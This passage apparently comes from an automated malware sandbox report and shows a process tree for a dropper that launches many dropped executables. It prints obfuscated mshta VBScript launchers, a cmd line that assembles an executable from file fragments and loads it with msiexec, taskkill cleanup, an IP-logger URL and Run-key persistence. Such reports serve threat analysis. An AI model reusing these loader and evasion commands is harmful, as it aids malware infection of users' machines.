C:\Users\Admin\AppData\Local\Temp\tuvhskyo.rdy\any.exeC:\Users\Admin\AppData\Local\Temp\tuvhskyo.rdy\any.exe12⤵
-
C:\Users\Admin\AppData\Local\Temp\tuvhskyo.rdy\any.exe"C:\Users\Admin\AppData\Local\Temp\tuvhskyo.rdy\any.exe" -u13⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jqxuo0qn.44j\gcleaner.exe /mixfive & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\jqxuo0qn.44j\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\jqxuo0qn.44j\gcleaner.exe /mixfive12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9944 -s 23613⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ljdowagf.kwu\autosubplayer.exe /S & exit11⤵
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue097328c1b990.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue097328c1b990.exeTue097328c1b990.exe6⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0978af55b9.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue0978af55b9.exeTue0978af55b9.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09a30919dc5f00.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09a30919dc5f00.exeTue09a30919dc5f00.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscrIPT: CLosE( creatEobjeCt ( "WSCRIpt.Shell" ). RUN ( "C:\Windows\system32\cmd.exe /R TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09a30919dc5f00.exe"" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If """" == """" for %b In (""C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09a30919dc5f00.exe"" ) do taskkill /f /iM ""%~Nxb"" " , 0 , TRUe ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09a30919dc5f00.exe" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If "" == "" for %b In ("C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09a30919dc5f00.exe" ) do taskkill /f /iM "%~Nxb"8⤵
-
C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u869⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscrIPT: CLosE( creatEobjeCt ( "WSCRIpt.Shell" ). RUN ( "C:\Windows\system32\cmd.exe /R TYPe ""C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe"" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If ""-PhwqM9LteEkjDz5gZPyhw9N49u86 "" == """" for %b In (""C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe"" ) do taskkill /f /iM ""%~Nxb"" " , 0 , TRUe ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If "-PhwqM9LteEkjDz5gZPyhw9N49u86 " == "" for %b In ("C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe" ) do taskkill /f /iM "%~Nxb"11⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscrIpT: cloSE ( cREateObJEct ( "wsCRipt.SheLl" ). rUn ( "Cmd.exe /q /R ecHo | sEt /P = ""MZ"" > ~dWBNpV.F & Copy /b /y ~dWbNpV.F + YsLNPQ.k + 9Jd86KPL.RS + 6VTZU.XA8+CQ3X0._ + 3hAXC.X ..\2GBhNGG.N &sTaRt msiexec.exe /y ..\2GbhNGG.n & DEl /Q * " , 0, TRue ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R ecHo | sEt /P = "MZ" > ~dWBNpV.F & Copy /b /y ~dWbNpV.F + YsLNPQ.k + 9Jd86KPL.RS + 6VTZU.XA8+CQ3X0._ + 3hAXC.X ..\2GBhNGG.N &sTaRt msiexec.exe /y ..\2GbhNGG.n & DEl /Q *11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHo "12⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>~dWBNpV.F"12⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /y ..\2GbhNGG.n12⤵
- Loads dropped DLL
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /iM "Tue09a30919dc5f00.exe"9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c6db969ab9.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c6db969ab9.exeTue09c6db969ab9.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c6db969ab9.exeC:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c6db969ab9.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 288⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09786995c7f02a923.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09786995c7f02a923.exeTue09786995c7f02a923.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c1731fe55c7.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c1731fe55c7.exeTue09c1731fe55c7.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c1731fe55c7.exeC:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c1731fe55c7.exe7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c1731fe55c7.exeC:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c1731fe55c7.exe7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c1731fe55c7.exeC:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c1731fe55c7.exe7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c1731fe55c7.exeC:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c1731fe55c7.exe7⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0947ef38552fc.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue0947ef38552fc.exeTue0947ef38552fc.exe6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Public\run.exeC:\Users\Public\run.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3088 -s 2888⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe7⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/18tji78⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e42947189⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2580 /prefetch:89⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:39⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:29⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4724 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:89⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:89⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4956 /prefetch:29⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2588 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2524 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1772 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:19⤵
- Suspicious use of SetThreadContext
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4512 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3728 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1280 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3732 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3988 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3748 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1772 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4008 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,17060261611277966692,1950114344913024262,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:19⤵
-
-
